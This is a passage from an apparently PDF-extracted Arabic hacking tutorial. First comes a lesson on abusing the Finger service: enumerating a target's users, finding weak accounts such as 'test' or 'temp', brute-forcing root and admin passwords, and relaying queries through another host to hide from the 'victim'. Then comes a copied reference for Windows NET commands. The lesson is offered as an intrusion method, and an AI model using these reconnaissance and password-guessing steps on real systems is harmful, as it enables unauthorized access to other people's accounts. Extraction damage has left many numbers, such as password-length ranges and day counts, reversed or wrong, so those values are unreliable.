      ‫لسنا بحاجة إلى أن نستعمل تيلنت ألنه يوجد بنظام لينوكس زبون)‪(client‬خاص بخدمة ‪Finger‬‬
                                                                           ‫‪Deamon‬‬


                                           ‫95‬
                                                                ‫مركب على النظام بشكل دائم تقريبا.‬

‫مالحظة ::: سيكون الشر ح التالي حتى نهاية الدرس لمستخدمي لينوكس أما أذا قررت األستمرار بأستخدام‬
    ‫وندوز ستكون كتابة األوامر في موجه الدوس ثم في التلنت وستكون كتابة األوامر نفسها األوامر التي‬
 ‫تنكتب بأستخدام نظام لينوكس ولكن بدل "@" نضع "مسافة ثم "‪ www‬في الوندوز مراعيا اسم الموقع‬
                                                          ‫مثال يكون كتابة األوامر في لينوكس هكذا :‬
                                                                  ‫‪finger@anyname.com‬‬
                                                                     ‫ولكن في وندوز سيكون هكذا :‬
                                                     ‫/‪finger http://www.anyname.com‬‬
                                                               ‫الحظ المسافة بين ‪ finger‬و ‪www‬‬


                       ‫اطبع في محث األوامر في يونكس ( على افتراض انك تستخدم: ) ‪unix shell‬‬

                                                                      ‫‪finger@foobar.com‬‬
                   ‫الحظ ان الهدف (الموقع المراداألستعالم عنه مثال معرفة من هم مستخدمينه ) هنا هو‬
                                                         ‫/‪http://www.foobar.com‬كمثال‬

                                                                                   ‫فستظهرالنتائج:‬

                                              ‫:‪Login: Name: Tty: Idle: When: Where‬‬

               ‫‪root foobar sys console 17d Tue 10:13 node0ls3.foobar.com‬‬
                                      ‫>.......< >.......< >.......< ‪Amos Amanda‬‬
                                                       ‫‪Anderson Kenneth‬‬
                                                              ‫‪Bright Adrian‬‬
                                                                    ‫‪Doe John‬‬
                                      ‫>.......< >.......< >.......< ‪Johnson Peter‬‬
                                                              ‫‪Mitnick Kevin‬‬
                                                              ‫‪Munson Greg‬‬
                                                             ‫‪Orwell Dennis‬‬


                                                                    ‫اآلن ماذا تعني هذه النتائج؟‬
         ‫في العمود األول) ‪ ( login‬نرى أسماء المستعملين وفي الثاني" )‪ (Name‬األسماء الحقيقية"،‬
                                            ‫التي بالطبع ليست حقيقية، لكن في معظم الوقت حقيقة.‬

                                    ‫يرينا العمود الثالث)‪ (Tty‬النوع الطرفي ‪the terminal type‬‬
                                                    ‫والرابع )‪ (Idle‬فترة التوقف.‪the idle time‬‬
                                                          ‫وبعد ذلك في العمودين الخامس والسادس‬
                                          ‫الوقت والمكان الذي استخدم فيه الحساب لألتصال بالنظام.‬
              ‫أحيانا توجد أعمدة بعنواوين األيميالت وأرقام هواتف ..الخ الخاصة بمستخدمين هذا النظام‬

              ‫إذا كنت تريد المزيد من المعلومات عن مستخدم معين ‪ (Johnson Peter‬بيتر جونسن‬
                                                     ‫على سبيل المثال) أدخل األمر التالي:‬

                                                           ‫‪finger johnson@foobar.com‬‬




                                              ‫06‬
                                                   ‫4.1بعض الخدع عند استخدام خدمة‪Finger‬‬
                                                  ‫========================= <‬
                                                                      ‫>===========‬

                                        ‫أتمنى اآلن شاهدت ما الضعف الرئيسي لخدمة.‪Finger‬‬
                             ‫‪Finger deamon‬يريك ماهي الحسابات الموجوده على النظام.‬
                     ‫هذا يعني أنك تكسب (عن طريق قانوني ) 25 % من المجموعة السحرية وهي‬
              ‫كلمات السر/مجموعة أسماء المستخدمين التي ستمنحك الدخول)‪ (Access‬إلى نظام.‬
        ‫إذا عرفت أسماء المستخدمين، ستكون الخطوة القادمة متوقفه على برنامج ‪ bruteforce‬أو‬
                        ‫بمعنى آخر برامج تخمين الباسوورد ‪worldist password cracker‬‬

                                          ‫هناك سكربتات خاصة كتبت للتيلنت على سبيل المثال‬
                       ‫اذهب لموقع /‪ http://www.thehackerschoice.com‬أو ابحث عن‬
                                                                  ‫‪VLAD's pwscan.pl‬‬

                    ‫لذلك يجب عليك ان تكون قائمة بكلمات السر في ملف نصي ‪ (word‬او المفكره)‬
                      ‫وحاول ان تكون كلمات السرقريبة من أسماء المستخدمين وإذا لم تعمل القائمة‬
     ‫استخدم برنامج- ‪ bruteforce‬أنصحك بهذا الوقت ان تحظر لك كأس شاهي وتأخذ لك استراحة‬
                                                                     ‫وتجعل البرنامج يعمل عمله-‬
                ‫بالطبع نجد بعض الحسابات للمستخدمين للنظام اكثر اهمية من غيرها من الحسابات.‬
   ‫وخاصة حساب اإلدارة )‪ (Admin‬أو الجذر )‪(root‬بسبب انه عندما تعرف الباسوورد الخاص بهم‬
                  ‫وقتها تستطيع التحكم بالموقع . وبالطبع بعض الحسابات سهلة تخمين كلمة السر .‬
                                ‫هناك بعض الخدع لمعرفة هذا النوع من الحسابات. على سبيل المثال‬
                                                                                   ‫إطبع األمر:‬

                                                           ‫‪finger secret@foobar.com‬‬

                     ‫عندما ترسل هذا األمر الي ‪ Finger Deamon‬سيعطيك جميع الحسابات‬
                    ‫التي تحتوي على كلمة "‪ "secret‬أما في اسم المستعمل أو اإلسم الحقيقي.‬
      ‫اذا، ماهو الشي المهم في هذا؟ حسنا أنت يمكنك أن تستعمل "‪ "test‬أو "‪ "temp‬أو "2222"‬
                   ‫بدال من "‪ "secret‬وكما تعرف من المحتمل ان يكون هذاالنوع من الحسابات‬
                                                   ‫سهل معرفة باسوورداته في أغلب األحيان.‬

                                                                  ‫‪finger .@foobar.com‬‬

                                                                  ‫‪finger 0@foobar.com‬‬

                                                       ‫جرب هذه األوامر وشاهد ما يحدث!‬
                        ‫حاول التعرف على ،‪ Finger Deamon‬أقرأ ‪RFC‬وأوجد خدعك بنفسك!‬



                                                ‫5.1األستعالم عن طريق موقع بأستخدام‪Finger‬‬
                                                 ‫========================= <‬
                                                                   ‫>=============‬

‫إذا أردت ان استخدم خدمة( ‪ Finger‬معنى ‪ Finger‬كفعل "ألمس" ولكنها تأتي هنا بمعنى "استعلم")‬
                                      ‫واألستعالم عن موقع معين مثل هذا"‪"www.victim.com‬‬
                    ‫وأيضا تعرف أن موقع آخر "‪ "www.host.com‬يقدم خدمة ‪ Finger‬تعمل،‬
                                ‫عندها يمكنني ان أقدم طلبا مثل هذا:(اكتب في محث األوامر مثل هذا)‬


                                           ‫16‬
                                                   ‫‪finger@host.com@victim.com‬‬

                             ‫‪Host.com‬يستعلم )‪ (Finger‬اآلن ‪ victim.com‬ويريك النتائج.‬
                                 ‫أحدالفوائد من هذه الطريقة انك ستكون مجهول لدى‪victim.com‬‬
                                                     ‫فعندما تقوم/‪http://www.victim.com‬‬
          ‫بطلب سجل (الدخول )‪log‬ستشاهد /‪ http://www.host.com‬في سجالتهم، بدال منك .‬
 ‫فائدة اخرى وهي أنك يمكن ان تترك( ‪ Host‬موقع) يقوم ( عن طريق خدمة) ‪ Finger‬باألستعالم عن‬
                                                                                     ‫حاسوبا‬
       ‫آخرا على نفس الشبكة ، بينما اذا طلبت انت هذا األستعالم بأستخدام خدمة ‪ Finger‬من جهازك‬
                                ‫لن تكون مسموحة لك ألنك سأكون غير موثوق به لدى المستعلم عنه‬
                               ‫بعكس اذا كان الطلب لألستعالم باستخدام ‪ Finger‬عن طريق موقع .‬

   ‫يعني الخالصة : ان الموقع الذي تريد األستعالم عنه يعتبر حاسوبك الشخصي غير موثوق به بعكس‬
                            ‫اذا كان األستعالم عن طريق موقع اخر يشابهه فسوف يسمح له !.‬


                                                           ‫6.1األستنتاج من هذا الدرس‬
                                                  ‫>=======================<‬

                  ‫‪Finger Deamon‬يمكن أن يكون مصدر معلومات ضخم ألي واحد يحاول‬
                                                      ‫كسب الدخول ) ‪( access‬إلى نظام.‬
                  ‫‪Finger deamon‬قانونيا يزودك بنصف كلمات السر واسماء المستخدمين‬
                                                     ‫التي تحتاجها لكسب الدخول.‪access‬‬
                          ‫هناك بضعة خدع لطيفة تمكنك من معرفة حسابات خاصة تبحث عنها‬
‫من معرفتك لهذه الحسابات تستطيع كسر الباسووردات ، بإستعمال تقنية ‪ wordlist‬أو.‪bruteforce‬‬
                 ‫تذكر فوائد "األستعالم عن طريق موقع"أيضا بأستعمال‪. Finger deamon‬‬

                                       ‫انتهى،،،‬




                                         ‫26‬
‫" شرح مختصر إلدارة الشبكة بإستخدام االمر‪" NET‬‬



                                                                ‫<منقول من موقع نورة>‬

           ‫تستخدم العديد من الخدمات أوامر شبكة االتصال التي تبدأ بالكلمة .‪ net‬تملك‬
                                           ‫أوامر ‪ net‬هذه بعض الخصائص المشتركة:‬
               ‫يمكنك مشاهدة قائمة بكافة أوامر ‪ net‬المتوفرة بكتابة ?/ ‪ net‬في موجه‬
                                                                           ‫األوامر .‬
         ‫يمكنك الحصول على تعليمات بناء الجملة في سطر األوامر ألمر ‪ net‬عن طريق‬
         ‫كتابة ‪net help command‬في موجه األوامر. على سبيل المثال، للحصول‬
                                  ‫على تعليمات األمر ،‪ net accounts‬اكتب مايلي :‬
                                                          ‫‪net help accounts‬‬
              ‫تقبل كافة أوامر ‪ net‬خيارات سطر األوامر ‪ (/y‬نعم) و ‪ (/n‬ال). على سبيل‬
         ‫المثال، يطالبك األمر ‪ net stop server‬بتأكيد رغبتك في إيقاف كافة خدمات‬
          ‫الملقم التابعة، بينما يتجاوز ،‪net stop server /y‬عن طريق اإلجابة بنعم‬
                        ‫تلقائياً، المطالبة بالتأكيد ويعمل على إيقاف تشغيل خدمة الملقم .‬
          ‫إذا كان اسم الخدمة يحتوي على فراغات، استخدم عالمات االقتباس حول النص‬
         ‫(أي .)"‪، "Service Name‬على سبيل المثال، يشغل األمر التالي خدمة ‪net‬‬
                                                                          ‫:‪logon‬‬
                                                      ‫"‪net start "net logon‬‬
                                                               ‫أوامر خدمات‪Net‬‬
                                                             ‫‪Net accounts‬‬
                 ‫يحدث قاعدة بيانات حسابات المستخدمين ويعدل كلمة المرور ومتطلبات‬
                                            ‫تسجيل الدخول من أجل جميع الحسابات.‬
                                                                      ‫بناء الجملة‬
                         ‫‪[/forcelogoff:{minutes | no}]net accounts‬‬
             ‫]‪[/maxpwage:{days | unlimited}] [/minpwlen:length‬‬
               ‫]‪[/domain] [/uniquepw:number] [/minpwage:days‬‬
                                      ‫المعلمات‬
                                              ‫}‪/forcelogoff:{minutes | no‬‬
                     ‫تعين عدد الدقائق التي يجب انتظارها قبل إنهاء جلسة عمل مستخدم‬
                         ‫مع ملقم ما عندما تنتهي مدة صالحية حساب المستخدم أو وقت‬
                        ‫تسجيل الدخول الصالح. تمنع القيمة االفتراضية ،‪، no‬من فرض‬
                                                    ‫تسجيل الخروج على المستخدمين.‬
                                                          ‫‪/minpwlen:length‬‬
                    ‫تعين الحد األدنى لعدد األحرف من أجل كلمة مرور حساب المستخدم.‬
                       ‫يتراو ح النطاق ما بين 2 و 162 حرفا ً ويكون االفتراضي هو ستة‬
                                                                            ‫أحرف .‬
                                         ‫}‪/maxpwage:{days | unlimited‬‬
                      ‫تعين الحد األقصى لعدد األيام التي تكون فيها كلمة المرور الخاصة‬
                     ‫بحساب المستخدم صالحة. تعين القيمة ‪ unlimited‬أنه ليس هناك‬
                     ‫حد أقصى للوقت. يجب أن يكون خيار سطر أوامر ‪/maxpwage‬‬


                                 ‫36‬
              ‫أكبر من ‪. /minpwage‬ويتروا ح النطاق ما بين 2 و 221,8.‬
                   ‫يوما ً (أي أن ‪ unlimited‬يكافئ 221,8. يوما ً)، والقيمة‬
                                                    ‫االفتراضية هي 28 يوما ً .‬
                                                     ‫‪/minpwage:days‬‬
           ‫تعين الحد األدنى لعدد األيام قبل أن يتمكن المستخدم من تغيير كلمة‬
              ‫مرور جديدة. القيمة االفتراضية هي 2 يوماً، والتي تعين أنه ليس‬
         ‫.‬ ‫هناك حد أدنى للوقت. ويتراو ح النطاق ما بين 2 و 221,8. يوما ً‬
                                                  ‫‪/uniquepw:number‬‬
                   ‫تتطلب أن ال يكرر المستخدم كلمة المرور نفسها بعدد المرات‬
              ‫‪number‬المعين لعمليات تغيير كلمة المرور. يتراو ح النطاق ما‬
               ‫بين 2 و .6 من عمليات تغيير كلمة المرور، واالفتراضي هو أن‬
                             ‫تكون عمليات التغيير بمقدار خمس كلمات مرور .‬
                                                                 ‫‪/domain‬‬
         ‫تنجز العملية على وحدة تحكم المجال األساسية للمجال الحالي. وإال,‬
                                       ‫يتم تنفيذ العملية على الكمبيوتر المحلي.‬
                                                 ‫‪net help command‬‬
                                          ‫تعرض التعليمات ألمر ‪ net‬المحدد .‬
                            ‫مالحظات‬
    ‫يجب أن تكون خدمة ‪ Net Logon‬قيد التشغيل على الكمبيوتر‬               ‫‪‬‬
   ‫حيث ترغب بتغيير معلمات الحساب. عند االستخدام دون معلمات،‬
        ‫يعرض ‪ net accounts‬اإلعدادات الحالية لكلمة المرور،‬
                       ‫وتحديدات تسجيل الدخول، ومعلومات المجال.‬
   ‫يجب تنفيذ مايلي قبل أن تتمكن من استخدام :‪net accounts‬‬               ‫‪‬‬
‫‪ o‬إنشاء حسابات المستخدمين. استخدم إدارة المستخدمين أو‬
                 ‫‪net user‬إلعداد حسابات المستخدمين .‬
     ‫‪ o‬تشغيل خدمة ‪ Net Logon‬على كافة الملقمات التي‬
     ‫تتحقق من تسجيل الدخول في المجال .يتم تشغيل ‪Net‬‬
                        ‫‪Logon‬تلقائيا ً عند بدء التشغيل .‬
 ‫عند استخدام :‪minutes، /forcelogoff‬يتم إرسال تحذير قبل‬                 ‫‪‬‬
            ‫دقائق من فرض تسجيل الخروج من شبكة االتصال على‬
    ‫المستخدمين. يتم أيضا ً إعالم المستخدمين فيما إذا كانت هناك أية‬
      ‫ملفات مفتوحة. إذا كانت ‪ minutes‬أقل من اثنين ،يتم تحذير‬
             ‫المستخدمين بتسجيل الخروج من شبكة االتصال فوراً .‬

                              ‫أمثلة‬
    ‫لعرض اإلعدادات الحالية، ومتطلبات كلمة المرور، ودور ملقم ما، اكتب:‬
                                                    ‫‪net accounts‬‬
 ‫لتعيين الحد األدنى بسبعة أحرف لكلمات مرور حسابات المستخدمين، اكتب:‬
                                  ‫7:‪net accounts /minpwlen‬‬
‫لتعيين إمكانية إعادة استخدام كلمة مرور من قبل المستخدمين فقط بعد المرة‬
                         ‫الخامسة التي يغيرون فيها كلمات المرور، اكتب:‬
                                  ‫5:‪net accounts /uniquepw‬‬
   ‫لمنع المستخدمين من تغيير كلمات المرور أكثر من كل سبعة أيام، وفرض‬
 ‫تغيير كلمات المرور عليهم كل 23 يوماً، وفرض تسجيل الخروج عليهم بعد‬
‫انتهاء مدة صالحية وقت تسجيل الدخول مع تحذير مدته خمس دقائق، اكتب:‬
              ‫03:‪net accounts /minpwage:7 /maxpwage‬‬
                                                   ‫5:‪/forcelogoff‬‬



                     ‫46‬
  ‫لضمان أن تكون اإلعدادات السابقة سارية المفعول من أجل المجال الذي تم‬
                                     ‫تسجيل دخول الكمبيوتر إليه، اكتب:‬
  ‫‪net accounts /minpwage:7 /maxpwage:30 /domain‬‬

                                                   ‫‪Net computer‬‬
                   ‫يضيف أو يحذف أجهزة كمبيوتر من قاعدة بيانات مجال.‬
                      ‫بناء الجملة‬
            ‫}‪net computer \\ComputerName {/add | /del‬‬

                         ‫المعلمات‬
                                                  ‫‪\\ComputerName‬‬
                           ‫تعين الكمبيوتر لتتم إضافته أو حذفه من المجال .‬
                                                          ‫}‪{/add | /del‬‬
                               ‫تضيف أو تزيل الكمبيوتر المعين من المجال .‬
                                               ‫‪net help command‬‬
                                        ‫تعرض التعليمات ألمر ‪ net‬المحدد .‬
                           ‫مالحظات‬
 ‫‪Net computer‬يعيد توجيه كافة عمليات إضافة وحذف أجهزة‬               ‫‪‬‬
                            ‫الكمبيوتر إلى وحدة تحكم المجال .‬

                            ‫أمثلة‬
                         ‫إلضافة الكمبيوتر ‪ Grizzlybear‬إلى مجال، اكتب:‬
                                 ‫‪add /\\grizzlybearnet computer‬‬

                                                          ‫‪Net config‬‬
‫يعرض الخدمات قيد التشغيل والقابلة للتكوين، أو يعرض ويغير إعدادات خدمة‬
      ‫الملقم أو خدمة محطة العمل. عند االستخدام دون معلمات، يعرض ‪net‬‬
                               ‫‪config‬قائمة بالخدمات القابلة للتكوين.‬
                  ‫بناء الجملة‬
                               ‫]}‪net config [{server|workstation‬‬

                         ‫المعلمات‬
                                                                ‫‪server‬‬
        ‫تعرض إعدادات خدمة الملقم وتسمح لك بإجراء تغييرات عليها بينما‬
                                                ‫تكون الخدمة قيد التشغيل .‬
                                                       ‫‪workstation‬‬
              ‫تعرض إعدادات خدمة محطة العمل وتسمح لك بإجراء تغييرات‬
                                    ‫عليها بينما تكون الخدمة قيد التشغيل .‬
                                                                       ‫?/‬
                                      ‫تعرض التعليمات في موجه األوامر .‬
                           ‫مالحظات‬
‫استخدم ‪ net config server‬لتغيير إعدادات خدمة الملقم القابلة للتكوين.‬



                    ‫56‬
                             ‫تكون التغييرات نافذة المفعول في الحال ودائمة .‬
‫ال يمكنك تغيير كافة إعدادات خدمة الملقم باستخدام .‪net config server‬‬
 ‫يعرض ‪ Net config server‬المعلومات التالية التي ال يمكنك تكوينها :‬
                                           ‫‪Server computer name‬‬
                                                    ‫‪Server comment‬‬
                           ‫( ‪Server version‬أي، رقم إصدار البرنامج )‬
                  ‫( ‪Server is active on‬أي، وصف لشبكة االتصال )‬
                             ‫( ‪Server hidden‬أي، اإلعداد ‪) /hidden‬‬
‫( ‪Maximum logged on users‬أي، الحد األقصى لعدد المستخدمين‬
                               ‫الذين يمكنهم استخدام موارد الملقم المشتركة )‬
    ‫( ‪Maximum open files per session‬أي، الحد األقصى لعدد‬
         ‫ملفات الملقم التي يمكن أن يفتحها المستخدمون أثناء جلسة العمل )‬
                                         ‫( ‪Idle session time‬بالدقائق )‬
‫استخدم ‪ net config workstation‬لتغيير إعدادات خدمة محطة العمل‬
                                                            ‫القابلة للتكوين .‬
                ‫يعرض ‪ Net config workstation‬المعلومات التالية:‬
                                                     ‫‪Computer name‬‬
                                                ‫‪Full computer name‬‬
                                                           ‫‪User name‬‬
             ‫( ‪Workstation active on‬أي، وصف لشبكة االتصال )‬
                        ‫( ‪Software version‬أي، رقم إصدار البرنامج )‬
                                               ‫‪Workstation domain‬‬
                              ‫‪Workstation domain DNS name‬‬
                                                       ‫‪Logon domain‬‬
                                      ‫( ‪COM open timeout‬بالثواني )‬
                                            ‫( ‪COM send count‬بالبت )‬
                                 ‫( ‪COM send timeout‬بالميللي ثانية )‬

                                              ‫‪Net continue‬‬
                  ‫يتابع خدمة تم إيقافها بشكل مؤقت بواسطة.‪net pause‬‬
                    ‫بناء الجملة‬
                                                  ‫‪net continue service‬‬

                           ‫المعلمات‬
                                                            ‫‪service‬‬
         ‫مطلوبة. تعين الخدمة التي تريد متابعتها. يسرد الجدول التالي بعض‬
                                                        ‫قيم .‪service‬‬
           ‫الوصف‬                             ‫القيمة‬
       ‫تتابع خدمة.‪Net Logon‬‬                           ‫‪netlogon‬‬
‫تتابع خدمة ‪NT LM Security‬‬                   ‫‪"nt lm security‬‬
    ‫.‪Support Provider‬‬                    ‫"‪support provider‬‬
         ‫تتابع خدمة جدولة المهام.‬                     ‫‪schedule‬‬
                ‫تتابع خدمة الملقم.‬                        ‫‪server‬‬
          ‫تتابع خدمة محطة العمل.‬                 ‫‪workstation‬‬
                                                ‫‪net help command‬‬



                      ‫66‬
                                         ‫تعرض التعليمات ألمر ‪ net‬المحدد .‬
                             ‫مالحظات‬
    ‫إلجراء تصحيح صغير على مورد ما، قم بإيقاف الخدمة مؤقتا ً.‬            ‫‪‬‬
‫استخدم األمر ‪ net continue‬إلعادة تنشيط الخدمة أو الطابعة،‬
                                    ‫دون إلغاء اتصاالت المستخدم .‬
   ‫يمكن أن يختلف تأثير إيقاف الخدمة مؤقتا ً ومتابعتها بحسب كل‬           ‫‪‬‬
                                                         ‫خدمة .‬
‫إذا كان اسم الخدمة يحتوي على فراغات، استخدم عالمات االقتباس‬             ‫‪‬‬
          ‫حول النص (على سبيل المثال .)"‪، "Service Name‬‬

                              ‫أمثلة‬
                                    ‫يتابع األمر التالي خدمة محطة العمل:‬
                                    ‫‪net continue workstation‬‬
     ‫إذا كان اسم الخدمة يتألف من كلمتين أو أكثر، عليك تضمين اسم الخدمة‬
          ‫ضمن عالمات اقتباس. على سبيل المثال، لمتابعة خدمة ‪NT LM‬‬
                 ‫،‪Security Support Provider Service‬اكتب:‬
       ‫"‪net continue "nt lm security support provider‬‬

                                                                ‫‪Net file‬‬
  ‫يعرض أسماء كافة الملفات المشتركة المفتوحة على ملقم ما وعدد عمليات‬
‫تأمين الملفات، في حال وجودها، على كل ملف. يغلق هذا األمر أيضا ً الملفات‬
‫المشتركة الفردية ويزيل عمليات تأمين الملفات. عند االستخدام دون معلمات،‬
                       ‫يعرض ‪ net file‬قائمة بالملفات المفتوحة على الملقم.‬
                     ‫بناء الجملة‬
                                                    ‫]]‪net file [ID [/close‬‬

                           ‫المعلمات‬
                                                                         ‫‪ID‬‬
                                                   ‫تعين رقم تعريف الملف .‬
                                                                    ‫‪/close‬‬
           ‫تغلق ملفا ً مفتوحا ً وتحرر السجالت التي تم تأمينها. اكتب هذا األمر‬
                     ‫من موجه األوامر على الملقم حيث تتم مشاركة الملف .‬
                                               ‫‪net help command‬‬
                                        ‫تعرض التعليمات ألمر ‪ net‬المحدد .‬
                             ‫مالحظات‬
                             ‫يمكنك أيضا ً كتابة ‪ net files‬لتشغيل هذا األمر .‬
‫استخدم ‪ net file‬لعرض الملفات المشتركة على شبكة االتصال والتحكم بها.‬
‫في بعض األحيان، يترك المستخدم ملفا ً مشتركا ً مفتوحا ً ومؤمنا ً بطريق الخطأ.‬
        ‫عند حدوث هذا، ال يمكن ألجهزة الكمبيوتر األخرى على شبكة االتصال‬
  ‫الوصول إلى األجزاء المؤمنة من الملف. استخدم ‪net file /close‬إلزالة‬
                  ‫التأمين وإغالق الملف. إن إخراج ‪ net file‬مشابه لمايلي :‬
                    ‫‪File‬‬         ‫‪Path‬‬              ‫‪Username #locks‬‬
                                   ‫-------------------------------------------‬
                      ‫0‬           ‫‪C:\A_FILE.TXT MARYSL‬‬                      ‫0‬



                      ‫76‬
                 ‫1‬         ‫‪C:\DATABASE‬‬                ‫‪DEBBIET‬‬           ‫2‬
                           ‫أمثلة‬
                           ‫لعرض معلومات حول الملفات المشتركة، اكتب:‬
                                                              ‫‪net file‬‬
                                  ‫إلغالق ملف لديه رقم التعريف 1، اكتب:‬
                                                    ‫‪net file 1 /close‬‬

                                                     ‫‪Net group‬‬
           ‫يضيف، أو يعرض، أو يعدل المجموعات العمومية في المجاالت.‬
                  ‫بناء الجملة‬
‫]]"‪[/domain] net group [groupname [/comment:"text‬‬

   ‫‪{/add [/comment:"text"] | net group [groupname‬‬
                                  ‫]]‪/delete} [/domain‬‬

‫}‪net group [groupname username[ ...] {/add | /delete‬‬
                                         ‫]]‪[/domain‬‬

                        ‫المعلمات‬
                                                        ‫‪groupname‬‬
       ‫تعين اسم المجموعة لتتم إضافتها، أو توسيعها، أو حذفها. عين اسم‬
                    ‫مجموعة لعرض قائمة المستخدمين في المجموعة فقط .‬
                                                  ‫"‪/comment:"text‬‬
        ‫تضيف تعليقا ً لمجموعة جديدة أو موجودة. يمكن أن يحتوي التعليق‬
      ‫على 0. حرفا ً كحد أقصى. قم بتضمين النص ضمن عالمات اقتباس .‬
                                                            ‫‪/domain‬‬
           ‫تنفذ العملية على وحدة تحكم المجال في المجال الحالي. وإال, يتم‬
                                      ‫تنفيذ العملية على الكمبيوتر المحلي .‬
                                                                  ‫‪/add‬‬
              ‫تضيف مجموعة، أو تضيف اسم مستخدم إلى مجموعة. يجب‬
        ‫تأسيس حساب للمستخدمين الذين تضيفهم إلى المجموعة باستخدام‬
                                                              ‫هذا األمر .‬
                                                               ‫‪/delete‬‬
                        ‫تزيل مجموعة، أو تزيل اسم مستخدم من مجموعة .‬
                                                     ‫]... [‪UserName‬‬
           ‫تسرد اسم واحد أو أكثر من أسماء المستخدمين لتتم إضافته إلى‬
           ‫مجموعة أو لتتم إزالته منها. افصل إدخاالت أسماء المستخدمين‬
                                                       ‫المتعددة بفراغات .‬
                                              ‫‪net help command‬‬
                                       ‫تعرض التعليمات ألمر ‪ net‬المحدد .‬
                         ‫مالحظات‬
      ‫عند االستخدام دون معلمات، يعرض ‪ net group‬اسم الملقم وأسماء‬
                                         ‫المجموعات الموجودة عليه .‬
                                     ‫يمكنك أيضاً كتابة .‪net groups‬‬
  ‫استخدم ‪ net group‬لتجميع المستخدمين الذين يستخدمون شبكة االتصال‬
   ‫بطرق متشابهة أو بنفس الطرق. عندما تعين حقوق لمجموعة ما، فإن كل‬


                   ‫86‬
      ‫عضو في المجموعة يملك هذه الحقوق تلقائيا ً. في اإلخراج، يسبق ‪net‬‬
 ‫‪group‬المجموعات التي تتضمن مستخدمين ومجموعات بآن واحد بالعالمة‬
                                                             ‫النجمية (*).‬
                 ‫إخراج ‪ net group‬للمجموعات على الملقم مشابه لمايلي:‬
                         ‫‪Group Accounts for \\PRODUCTION‬‬
                           ‫----------------------------------------------‬
                       ‫‪Domain Users*Domain Admins‬‬                       ‫*‬
                            ‫أمثلة‬
         ‫لعرض قائمة بكافة المجموعات الموجودة على الملقم المحلي، اكتب:‬
                                                         ‫‪net group‬‬
‫إلضافة مجموعة تدعى ‪ nor‬إلى قاعدة بيانات حسابات المستخدمين المحلية،‬
                                                                 ‫اكتب:‬
                                             ‫‪net group NOR /add‬‬
               ‫إلضافة مجموعة تدعى ‪ nor‬إلى قاعدة بيانات المجال، اكتب:‬
                                 ‫‪net group NOR /add /domain‬‬
 ‫إلضافة حسابات المستخدمين الموجودة ‪ ،stevev‬و ‪ ،ralphr‬و ‪jennyt‬‬
                         ‫إلى المجموعة ‪ nor‬على الكمبيوتر المحلي، اكتب:‬
                ‫‪net group NOR stevev ralphr jennyt /add‬‬
 ‫إلضافة حسابات المستخدمين الموجودة ،‪ stevev‬و ،‪ ralphr‬و ‪jennyt‬‬
                       ‫إلى المجموعة ‪ nor‬في قاعدة بيانات المجال، اكتب:‬
    ‫‪net group NOR stevev ralphr jennyt /add /domain‬‬
                            ‫لعرض المستخدمين في المجموعة ،‪ nor‬اكتب:‬
                                                   ‫‪net group NOR‬‬

                                                         ‫‪Net help‬‬
       ‫يوفر قائمة بأوامر ومواضيع شبكة االتصال التي يمكنك الحصول على‬
‫التعليمات الخاصة بها، أو يوفر معلومات حول أمر معين. عند االستخدام دون‬
‫معلمات، يعرض ‪net help‬قائمة باألوامر والمواضيع التي يمكنك الحصول‬
                                           ‫على التعليمات الخاصة بها.‬
                   ‫بناء الجملة‬
                                                ‫]‪net help [command‬‬

                         ‫المعلمات‬
                                                           ‫‪command‬‬
                                                                  ‫‪/help‬‬
                              ‫تعرض بناء الجملة الصحيح وتعليمات األمر .‬
                                ‫تعين األمر الذي تريد التعليمات الخاصة به .‬
                            ‫أمثلة‬
                         ‫لعرض التعليمات الخاصة باألمر ،‪net use‬اكتب:‬
                                                    ‫‪net help use‬‬
                                                             ‫أو اكتب:‬
                                                   ‫‪net use /help‬‬
                          ‫لعرض بناء الجملة لألمر ‪ net help‬فقط، اكتب:‬
                                                       ‫?/ ‪net help‬‬

                                                      ‫‪Net helpmsg‬‬


                    ‫96‬
                    ‫يفسر سبب حدوث خطأ ويوفر معلومات لحل المشكلة.‬
                  ‫بناء الجملة‬
                                           ‫#‪net helpmsg message‬‬

                        ‫المعلمات‬
                                                        ‫#‪message‬‬
        ‫مطلوبة .تعين الرقم ذو الخانات األربعة للرسالة التي تريد الحصول‬
                                     ‫على المزيد من المعلومات حولها .‬
                                           ‫‪net help command‬‬
                                   ‫تعرض التعليمات ألمر ‪ net‬المحدد .‬
                         ‫مالحظات‬
           ‫عند فشل عمل شبكة االتصال، تظهر رسالة مشابهة لمايلي :‬
     ‫‪2182: The requested service has already been‬‬
                                                      ‫.‪started‬‬
                           ‫أمثلة‬
     ‫للحصول على المزيد من المعلومات حول رسالة اإلعالم بالخطأ ‪NET‬‬
                                                     ‫،2812اكتب:‬

                                              ‫2812 ‪net helpmsg‬‬


                                                 ‫‪Net localgroup‬‬
     ‫يضيف المجموعات الحلية، أو يعرضها، أو يعدلها. عند االستخدام دون‬
     ‫معلمات، يعرض ‪ net localgroup‬اسم الملقم وأسماء المجموعات‬
                                                 ‫المحلية على الكمبيوتر.‬
                  ‫بناء الجملة‬
     ‫]]"‪net localgroup [GroupName [/comment:"text‬‬
                                      ‫]‪[/domain‬‬

‫‪{/add [/comment:"text"] net localgroup [GroupName‬‬
                                 ‫}‪[/domain]] | /delete‬‬

      ‫]... [ ‪{/add | net localgroup [GroupName name‬‬
                                  ‫]]‪/delete} [/domain‬‬

                        ‫المعلمات‬
                                                     ‫‪GroupName‬‬
        ‫تعين اسم المجموعة المحلية لتتم إضافتها، أو توسيعها، أو حذفها.‬
        ‫عند االستخدام دون معلمات إضافية، يعرض ‪net localgroup‬‬
        ‫‪GroupName‬قائمة بالمستخدمين أو المجموعات العمومية في‬
                                                    ‫المجموعة المحلية .‬
                                                ‫"‪/comment:"text‬‬
        ‫تضيف تعليقا ً لمجموعة جديدة أو موجودة. يمكن أن يحتوي التعليق‬


                   ‫07‬
                      ‫حتى 0. حرفا ً. قم بتضمين النص ضمن عالمات اقتباس.‬
                                                               ‫‪/domain‬‬
           ‫تنفذ العملية على وحدة تحكم المجال األساسية للمجال الحالي. وإال,‬
                                     ‫يتم تنفيذ العملية على الكمبيوتر المحلي .‬
                                                             ‫]... [ ‪name‬‬
              ‫تسرد اسما ً واحداً او أكثر من أسماء المستخدمين أو المجموعات‬
                                  ‫لتتم إضافتها أو إزالتها من مجموعة محلية.‬
                                                                     ‫‪/add‬‬
          ‫تضيف اسم مجموعة عمومية أو اسم مستخدم إلى مجموعة محلية.‬
          ‫عليك أوالً تأسيس حساب للمستخدمين أو المجموعات العمومية قبل‬
